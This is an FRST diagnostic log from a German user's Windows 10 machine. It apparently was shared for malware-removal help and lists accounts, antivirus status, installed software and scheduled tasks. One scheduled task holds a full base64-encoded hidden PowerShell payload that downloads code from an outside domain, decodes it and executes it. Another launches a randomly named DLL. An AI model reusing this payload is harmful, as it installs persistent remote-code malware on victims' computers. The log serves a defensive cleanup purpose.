FRST Additions Logfile: Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-01-2016
durchgeführt von Patrick (2016-01-31 06:18:32)
Gestartet von C:\Users\Patrick\Downloads
Windows 10 Home (X64) (2016-01-05 22:18:40)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1478378272-1933348484-2964354189-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1478378272-1933348484-2964354189-503 - Limited - Disabled)
Gast (S-1-5-21-1478378272-1933348484-2964354189-501 - Limited - Disabled)
Patrick (S-1-5-21-1478378272-1933348484-2964354189-1001 - Administrator - Enabled) => C:\Users\Patrick
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Kaspersky Anti-Virus (Enabled - Up to date) {B41C7598-35F6-4D89-7D0E-7ADE69B4047B}
AS: Kaspersky Anti-Virus (Enabled - Up to date) {0F7D947C-13CC-4207-47BE-41AC12334EC6}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
ACP Application (Version: 2015.1204.1152.59 - Advanced Micro Devices, Inc.) Hidden
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Catalyst Control Center Next Localization BR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.14 - Piriform)
Devil May Cry® 4 Special Edition (HKLM-x32\...\Steam App 329050) (Version: - CAPCOM Co., Ltd.)
Dungeon Defenders II (HKLM-x32\...\Steam App 236110) (Version: - Trendy Entertainment)
Dust: An Elysian Tail (HKLM-x32\...\Steam App 236090) (Version: - Humble Hearts LLC)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version: - Bethesda Game Studios)
FTL: Faster Than Light (HKLM-x32\...\Steam App 212680) (Version: - Subset Games)
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
Intel(R) Network Connections 20.2.4001.0 (HKLM\...\PROSetDX) (Version: 20.2.4001.0 - Intel)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (x32 Version: 10.1.1.8 - Intel(R) Corporation) Hidden
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
Kaspersky Anti-Virus (HKLM-x32\...\InstallWIX_{77E7AE5C-181C-4CAF-ADBF-946F11C1CE26}) (Version: 16.0.0.614 - Kaspersky Lab)
Kaspersky Anti-Virus (x32 Version: 16.0.0.614 - Kaspersky Lab) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden
Malwarebytes Anti-Malware Version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 43.0.4 (x86 de) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 de)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 38.5.0 - Mozilla)
Mozilla Thunderbird 38.5.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 38.5.0 (x86 de)) (Version: 38.5.0 - Mozilla)
Mozilla Thunderbird 38.5.1 (x86 de) (HKU\S-1-5-21-1478378272-1933348484-2964354189-1001\...\Mozilla Thunderbird 38.5.1 (x86 de)) (Version: 38.5.1 - Mozilla)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.61.5 - Black Tree Gaming)
Ori and the Blind Forest (HKLM-x32\...\Steam App 261570) (Version: - Moon Studios GmbH)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7560 - Realtek Semiconductor Corp.)
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.106 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.53254 - TeamViewer)
Undertale (HKLM-x32\...\Steam App 391540) (Version: - tobyfox)
Warframe (HKLM-x32\...\{4E9E5572-1C2F-4867-AEE8-5FF4A8BCA70B}) (Version: 1.0.0 - Digital Extremes)
WildStar (HKLM-x32\...\WildStar) (Version: - NCSOFT)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-1478378272-1933348484-2964354189-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Patrick\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\FileCoAuth.exe (Microsoft Corporation)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {0CFE2E40-6A97-48C5-9F38-DE82315CF1B0} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {36E04712-D4BA-4B02-824D-9ED5E36DEDD4} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-01-14] (Microsoft Corporation)
Task: {3EB0E465-0EEC-4651-B5D6-9237C4F4E49F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-01-15] (Piriform Ltd)
Task: {587A6D0F-D966-46D7-9EF3-4F527071DE9B} - System32\Tasks\{7D0E0847-0F7A-0D08-7E11-08780579110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAcgBpAGcAaAB0AGMAaABpAGUAZgAuAGMAbwBtAC8AdQAvAD8AYQA9AEwATgBnAGEARABhAFoAeQBVAFgAOABXAHUAUwBZAGkAbwBTAE8ANgBLAFcARQB5AGEAeQBRAEYAVwBoAFoAVABIAEkANgAzAGwAeABkAG4ATwBOAEEAMABXAHAAUwA5AFIAawBhADkAbwBpAGYAdgBzAHkATABZAHMAMABUAEkAZgBwAE0ATwAxAE4ANgBpAHoAdAA0AHYAZwBCADMARgBIAG0ATwBuAGYARQBTAGsAbABkAHIAUABXADYAVAAxAHAAUAA4AGQARgBYAF8AUwBPAHMASABWAGoANgBTAGcAZgBiAFAARwByAEwAUgB5AE4AVgAyAEwAZgBSAE4ANABpAHgAeABVADAAagBwADIAdQB3AE4AbAByAG4AZwB5AEMAQgBfAEUAQQBfAE8AYgBNAFIANwBrAE8AYgBBAE0AMQBCAGIAYgBvAHgAWAA5AEsAYQA4AE0AbQA5ADUARQBIAG4AMQAzAGkAdABNAHIAQQBQAEwAdgBSAHcAVwBUAE8AZgBHAFkAYgAxADcATgByAGoANQA5AGQAbABDAGUAYwA3AFEAZAA5AGgAWQBvAG8AbwBEADAANwAtAEEAUQBtADEARwBBAEwASQBfAHMAYQB6AEoAWABXAFgARgBIAEMATQAxAGoAQgBUAEEANAAxADkARgBhAG4AaABSAFIARgBEAE4AcwBVAFYAUAA1AHgASQBEAFQAdABKADkAMAByADQAeQBQAEcAagBCAHkARQBIAFcAZgBiAEsANQB0AHQANwAzAEEAYQB2ADIAeABvAEQAMgBJAGkARABWAFcASQBCAE0AMAAtAGQARQByAFAAZABtAHUAcABnAG8AOAB4AHYAVwBwAGoAUABJAHQATABqAHAAWQA4AFEAUQBIAHcAZQBPAE4AWABXAEsAYwBZAHMAbwBHADEAOQBQADMAcwBfAFYAOABrAEYAagBIAHIAWgA2AEcATwBtAFEAUwBxAEMAVwBXAEcAMwAxADYARQBQADAAMwB1AGcATgB6AEQAZQBoAEQAdwBVAFcATABoAGcAcABCADYANgA3AFkAUQBLAG8AcgBOADEAQwBuAFMAVQBZAFYAZgAxAE8AcABNAGEAdABHADkANABKAGsAbwBoAEEAQQB1AEIAMwBXAEkATgBWAGsANwA5AHQAMwBwAHYAMwBfAFYAQwBxAHEAYgBOAEkAcgBKAGgAeQB0AHEANABrAFAAaQA1AFQAYQBfAGcAQwAzAFcAcAA3AHgAcQBrAGcASAAzAFAAZABaAHoARABHAE0AYgBQAEgAYQBfAGEAZABMAEYAZgBkAFcAbQBqAEYAVABvADgALQBJAEoAWgBxAGUAaABhAGwAVABsAHQAOAB1AGwAbgBaAGsAbAB4AFQAYQBMAHYAUgBrAE0AUwBPAC0AbwBYAFcAQQAwAEQAYQB0AGIAVgBhAEcAagBKAGkASgBTAGMAdAByAE8ATwBVAEsAWABuAFkAcQBGAFkAdgBGAGMAYQBSAGUAdgBYAEIAWABYAHAAQwBCAFIARwBHAHQAQgBtAGgAawBhAEUAeABGADgAaAA5ADMASgB1AHgASQBiAG8ATgB4AEsAcwBIAGgATgBnAEQAaQBsAEcASAByAHkAUgBhAFAAXwBzAFcAdwBKAEIAZQBTAFQASgB2AFAARwA3AGgAOQB4AGkAUgBQAHAAdwB2AGEAUQA3AGoAXwBqAFcAWABJADYAZgBwAG0ARwBvAFIATgBWAFoAdAB1AFYALQBaAGgAVAByAGYAVwB3AFgATQByADcAZAB5AE0AMABVAGEAYQBvAEoAVQAtAEQAUgBUAEUATwBXAG8AWgA5AFIAUwBIAEQAWQBIADkARQBhAFMAbwBBAGwAcQBvADgAeQBsADkAQgAyAGcASQBFAE8AYwBiAFoASAAtADMAUAB6AE8ASwBIADMAegBxAFYAUwBuADQAWQAtAFcAbwBhAGMAVABDAEEATwBwAHMANwBtAE0AUQB5AHUAeAAzAG0AbwBUADEAagB3AF8AZgB1AHcASgBjAEgAbABmAG4AdAA1AEsAYgBfAHYALQBZAEgAeABKAHEAVAAzAHIARQBwAFoAdgBpADAAdABJAEQAdwBNAHUAbQBsAEEAZQBpAF8AWABCAFEAdgBTAE4ALQBtAFIAUAA1AHcANABYAFkAbgBGAEoAOQBfADgAUgBGAFkATQAmAGMAPQBtAHQAVgA0AEUAYQBzAFoAWABsAGgATwAxAHEAbABlADMAZgBVAG8ANQBvAGUAMwBRAFUAOAAwADIAdABIAEIAagBOAFYAcABCAFUAZQBtAE8ATgBkAEYAawA2ADgARgB1AC0AegBpAEIAaQB5AFIAMQBOAG8ANgBLAGIANABGAF8AWABWAG8AdQBTAFYARwBtAG0AaQBfAEwAWABMAFkAMwBEADQAWgBsAE8ANgBaADkATgBqAG4AUAAwAFIAQgBLADQAawB4AGoAXwBkAGQASAA4AEcASQBZADQAagA4ADcARQBxAEQAbQB0AFcANgB3AHkANQBzAEwATwB0AHYAYwB0AHkAZgA0AFIATgBmAGMAQQBPAFIAOQBvADcANQBkAHMAaABnAEEASgBQAEwANQA0AHEAWAA5ADMAMABCAGcARgBoADAAQwBKAEMAdwBBAG0AQwBQAE4AQwAtAHoAegBpAHAARgBtAEgARABRADYAXwBuAF8ATABGAC0AbgA2AE8AbAA2AEMAWQBZAEgAWQAwAHYANgBkADUAaABIAEYAZABXAGYAVgBQAEwAUQB5AFcAcAB6ADkANABvAG8ALQBsAGQAZQB3AE0AZABsAFoAegBBAF8AbgBXAHEAdgBIADYAcwBjAGIAUwBrAGwAQQBEAEwAcwA5AEMATwBHAEkALQBNAEMATQBzAHAAMQBLAG8ASAAyADUAcAA2AHQAMAB0AGEAbQBDADEAeAAyAFAAUgBxAHEAYQA5AEUATwB3AGIAUgBmADQAbQBHAHYARwBiAHkAbwA0ADIAbgBEAE4AaABKAHIAagBtAFgAOABkADMARQB5AG4ANgBQAG0AbQAtAGkAawBqAEYAZgBNAHoAYgBxAFoASABwAGMAZgAyAFIAcABiAHUAVQBjAGkAbABHAGgAMAB2AEQARQBvAHUARAA1AHkAMQA4AHQAWABwAGcAYQBsADQAdQBIAHUAUAB5AGQAUAA1AE0ANgA1AE0AMQB4ADUAQQBtAEkAWgAzADIAcABlAE0AMQBjAEMAeAB6AEYAawB3ADcAVwAwAHQAQgBmADAAdwByAFkAYQB6AEkARABWAGIAbQBHAFEASABYAEIANgBfAGoAaQAxAE4AMwBMAGoAYgBFAGgAQwBHAEwAMwBNAE8AcgBfAFUANgBqAFgATABKAFoAUABsAC0AcwA2AGEAUgAwAFoAeQBLAGUAXwAyAFMAeQByAHEATQB6AHkANgBKAGYAegBWAFYARwA5ADMAaABSAHAAQQBsAEoAMwBiAGIAMABHAFYAWQBzAEcAbgBnAFAAXwB3AFMARgBiAGUAVQBUAGUAcwBPAHQANAB2AEsAbgB4ADUAcQB6AG0AeABNAHAAMwB2AFAAYwBPAGUAaQBNAEMAMQB1AGgAZgBlADkAYQA1AHAAbAB2AGwARABYAHMAaQBEAEoATQB6AHMAcgBjAFcASgBpAF8AUABfADAASAB3AGIANABUAEUAagA4AEoAUQBhAG0AUgBqAFIAbwBBAFIAZQB2AGIAMgBBADkASgBIAFAAegBpAHAAUgBBAEsAUwAtAEwANgBLAHUAbABhAHUAagBSAE4ATgA1AGgAegBQAEUAUwAwAGEAcwB6ADQAbgB0AFIAZQBfAGMALQAxADkAbQBzAGUAcwBQAEwAUgBVAE0AeQBNAEYAUQBwADAANgB1AFYAbgBvAEcATABHAFgATAB1AGcAcABjAHYAQwB1ADkAQgB0AGoAMQBaADAAUgBnAGIARwA5ADIAQgB0ADQAOQBPAF8AawBaAHoASgBLAFcAZQBBADkAOAAwAHAAdwBjADAAWABiAG8ARABKAE8AcwBiAHUAQQBzAHYAUgB0ADMAVwBzADcANwBiAHMAdwBaAC0AUwBuADgAMgBHAHoAYgBsAHMAVABKAEIAaQBtAFEAeABhAHAAQgBwAHEAZQBLAHQARABMAEkAeQB3AEIATAA4AE4ANQAyAFgAcABYAFMAVQBrADkAeQBhADMAVABOAFYANQBtAEcATQB3AG0AQgBBAFMAegA1AEoAcQBEAGsAawBHAHcAVQBsAE4ANAB1AHQAMgAzAEMAegA4ADkAUgByADgATwBBAHIATgBUAGIAdABjAEYARwBqAFkAbQBvAEcAMAAyAHgAcgBDAHoANgBKAFcAYQBjADcAVwBaAG8AMwBaADcAYwBmAG8AcABwAHUAMQAyAFYAJgByAD0AMQA1ADQAMQAzADcANQAzADEAMQA0ADMANQA2ADAANAAzADYAOQAiADsAJABzAHQAcwBrAD0AIgB7ADcARAAwAEUAMAA4ADQANwAtADAARgA3AEEALQAwAEQAMAA4AC0ANwBFADEAMQAtADAAOAA3ADgAMAA1ADcAOQAxADEAMABGAH0AIgA7ACQAcAByAGkAZAA9ACIAZgBsAG8AYQB0AGkAbgBnACIAOwAkAGkAbgBpAGQAPQAiAFEAVABVAFMAUQBXAFAAUwAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {CAB0C8CB-F914-4C4D-8234-5739CA0FC465} - System32\Tasks\{42AF341B-4D9E-361A-7AE5-6B71330AD047} => /s /n /i:"/rt" "C:\PROGRA~3\da0545d9\f349c2eb.dll"
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2015-10-30 08:18 - 2015-10-30 08:18 - 00185856 _____ () C:\Windows\SYSTEM32\ism32k.dll
2016-01-06 23:40 - 2015-11-22 11:47 - 02653816 _____ () C:\Windows\system32\CoreUIComponents.dll
